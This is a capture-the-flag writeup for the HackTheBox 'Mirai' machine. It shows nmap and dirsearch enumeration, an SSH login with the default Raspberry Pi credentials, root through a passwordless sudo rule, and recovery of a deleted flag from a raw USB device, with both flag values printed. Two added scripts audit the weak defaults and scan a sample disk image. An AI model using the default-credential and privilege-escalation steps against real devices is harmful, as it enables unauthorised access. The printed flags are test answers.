HackTheBox Mirai

Writeup for HackTheBox Mirai

Machine Synopsis

Mirai demonstrates one of the fastest-growing attack vectors in modern times; improperly configured IoT devices. This attack vector is constantly on the rise as more and more IoT devices are being created and deployed around the globe, and is actively being exploited by a wide variety of botnets. Internal IoT devices are also being used for long-term persistence by malicious actors. (Source)

Enumeration

$ nmap -sC -sV -A 10.10.10.48

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey: 
|   1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA)
|   2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA)
|   256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA)
|_  256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519)
53/tcp open  domain  dnsmasq 2.76
| dns-nsid: 
|_  bind.version: dnsmasq-2.76
80/tcp open  http    lighttpd 1.4.35
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: lighttpd/1.4.35

Trying to view the webpage leads us to a web page error.

[Screenshot: website_error]

Let’s add the hostname mirai.htb to the /etc/hosts file.

Accessing the webpage now shows that it is blocked.

[Screenshot: website_blocked]

I used dirsearch to check whether there are any hidden directories.

$ dirsearch -u http://mirai.htb -w /usr/share/dirb/wordlists/common.txt
...
[21:05:29] 301 -    0B  - /admin  ->  http://mirai.htb/admin/
...

Navigating to /admin shows the following webpage.

[Screenshot: website]

The website looks like a dashboard for a Raspberry Pi.

Exploitation

Trying to log in with the default password raspberry didn’t work. However, SSH using the default credentials pi:raspberry worked.

$ ssh pi@10.10.10.48               
pi@10.10.10.48's password: 
pi@raspberrypi:~ $ 

Privilege Escalation

pi@raspberrypi:~ $ ls
background.jpg  Documents  Music         Pictures  python_games  Videos
Desktop         Downloads  oldconffiles  Public    Templates
pi@raspberrypi:~ $ sudo -l
Matching Defaults entries for pi on localhost:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User pi may run the following commands on localhost:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: ALL

pi@raspberrypi:~ $ sudo bash
root@raspberrypi:/home/pi# ls
background.jpg	Documents  Music	 Pictures  python_games  Videos
Desktop		Downloads  oldconffiles  Public    Templates
root@raspberrypi:/home/pi# cd Desktop/
root@raspberrypi:/home/pi/Desktop# ls
Plex  user.txt
root@raspberrypi:/home/pi/Desktop# cat user.txt
ff837707441b257a20e32199d7c8838d
root@raspberrypi:/home/pi/Desktop# find ~/ -name root.txt
/root/root.txt
root@raspberrypi:/home/pi/Desktop# cat /root/root.txt 
I lost my original root.txt! I think I may have a backup on my USB stick...
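
The access path up to this point depended on password SSH logins for the stock pi account and a NOPASSWD: ALL sudoers rule. The script below is an added example (not part of the original writeup) that audits copies of those files; the function names, the sample files and the "login shell" heuristic for the pi account are assumptions, and Match blocks in sshd_config are not evaluated.

```shell
#!/bin/sh
# Added example. Paths are arguments so the audit can run on copies of the files.

# audit_pi_defaults SUDOERS SSHD_CONFIG PASSWD
# Prints one FINDING line per issue; returns 1 if anything was found.
audit_pi_defaults() {
    rc=0
    # Uncommented sudoers rule granting every command without a password.
    hit=$(grep -En '^[^#]*NOPASSWD:[[:space:]]*ALL([[:space:],]|$)' "$1" || true)
    if [ -n "$hit" ]; then
        echo "FINDING sudoers: NOPASSWD: ALL at line $hit"; rc=1
    fi
    # sshd keeps the first value it reads; an unset keyword defaults to yes.
    pa=$(awk 'tolower($1) == "passwordauthentication" { print tolower($2); exit }' "$2")
    if [ "${pa:-yes}" = "yes" ]; then
        echo "FINDING sshd: password logins allowed (PasswordAuthentication ${pa:-unset})"; rc=1
    fi
    # Heuristic: stock "pi" account that can still log in interactively.
    if awk -F: '$1 == "pi" && $7 !~ /(nologin|false)$/ { found = 1 } END { exit !found }' "$3"; then
        echo "FINDING passwd: default account pi has a login shell"; rc=1
    fi
    return $rc
}

# Constructed sample files: "weak" mirrors the sudo -l output above.
write_samples() {
    mkdir -p "$1/weak" "$1/hardened"
    printf 'root ALL=(ALL:ALL) ALL\npi ALL=(ALL) NOPASSWD: ALL\n'  > "$1/weak/sudoers"
    printf '#PasswordAuthentication yes\nPermitRootLogin no\n'     > "$1/weak/sshd_config"
    printf 'pi:x:1000:1000:,,,:/home/pi:/bin/bash\n'               > "$1/weak/passwd"
    printf 'root ALL=(ALL:ALL) ALL\n%%sudo ALL=(ALL:ALL) ALL\n'    > "$1/hardened/sudoers"
    printf 'PasswordAuthentication no\nPubkeyAuthentication yes\n' > "$1/hardened/sshd_config"
    printf 'admin:x:1000:1000:,,,:/home/admin:/bin/bash\n'         > "$1/hardened/passwd"
}

d=$(mktemp -d)
write_samples "$d"
for cfg in weak hardened; do
    echo "== $cfg =="
    audit_pi_defaults "$d/$cfg/sudoers" "$d/$cfg/sshd_config" "$d/$cfg/passwd" || true
done
rm -rf "$d"
```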

It seems like the root flag is not there but there is a hint that it’s in a USB file system. We can use df to view the summary of file systems.

root@raspberrypi:~# df
Filesystem     1K-blocks    Used Available Use% Mounted on
aufs             8856504 2839864   5543708  34% /
tmpfs             102396    4892     97504   5% /run
/dev/sda1        1354528 1354528         0 100% /lib/live/mount/persistence/sda1
/dev/loop0       1267456 1267456         0 100% /lib/live/mount/rootfs/filesystem.squashfs
tmpfs             255988       0    255988   0% /lib/live/mount/overlay
/dev/sda2        8856504 2839864   5543708  34% /lib/live/mount/persistence/sda2
devtmpfs           10240       0     10240   0% /dev
tmpfs             255988       8    255980   1% /dev/shm
tmpfs               5120       4      5116   1% /run/lock
tmpfs             255988       0    255988   0% /sys/fs/cgroup
tmpfs             255988       8    255980   1% /tmp
/dev/sdb            8887      93      8078   2% /media/usbstick
tmpfs              51200       0     51200   0% /run/user/999
tmpfs              51200       0     51200   0% /run/user/1000

There is a filesystem mounted on /media/usbstick.

root@raspberrypi:/# cd media/usbstick
root@raspberrypi:/media/usbstick# ls
damnit.txt  lost+found
root@raspberrypi:/media/usbstick# cat damnit.txt 
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?

-James

Now it seems like the flag has been deleted from the filesystem. It turns out we can still find the root flag by running strings against the raw device /dev/sdb.

root@raspberrypi:~# strings /dev/sdb
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
/media/usbstick
2]8^
lost+found
root.txt
damnit.txt
>r &
3d3e483143ff12ec505d026fa13e020b
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James
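
The value is still readable because deleting a file removes its directory entry while the data blocks stay on the device until they are overwritten. The script below is an added example (not part of the original writeup) that narrows a raw scan to 32-character hex runs and reports where they sit; SAMPLE_VALUE, the image layout and the 1024-byte block size are constructed assumptions.

```shell
#!/bin/sh
# Added example. SAMPLE_VALUE and the image layout are constructed, not taken from the box.
SAMPLE_VALUE=0123456789abcdef0123456789abcdef

# make_sample_image FILE: raw "device" where nothing points at the value any
# more; it survives only as leftover bytes in block 2 (1024-byte blocks).
make_sample_image() {
    {
        dd if=/dev/zero bs=1024 count=1 2>/dev/null          # block 0: empty
        printf 'lost+found\000damnit.txt\000'                # block 1: 22 bytes of names
        dd if=/dev/zero bs=1002 count=1 2>/dev/null          # pad block 1 to 1024 bytes
        printf '%s\n' "$SAMPLE_VALUE"                        # block 2: leftover content
        printf 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\n'  # 40 hex chars: wrong length
        printf 'Sorry man I accidentally deleted your files\n'
    } > "$1"
}

# find_hex32 IMAGE [BLOCK_SIZE]: report printable runs that are exactly 32
# lowercase hex characters, with byte offset and block number.
find_hex32() {
    # tr maps each non-printable byte to one newline, so byte offsets are preserved.
    LC_ALL=C tr -c '[:print:]' '\n' < "$1" |
    LC_ALL=C awk -v bs="${2:-1024}" '
        BEGIN { off = 0 }
        length($0) == 32 && $0 !~ /[^0-9a-f]/ {
            printf "offset=%d block=%d value=%s\n", off, int(off / bs), $0
        }
        { off += length($0) + 1 }'
}

img=$(mktemp)
make_sample_image "$img"
find_hex32 "$img"
rm -f "$img"
```

On real media, run the scan against a read-only image copy of the device rather than the mounted stick.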

This post is licensed under CC BY 4.0 by the author.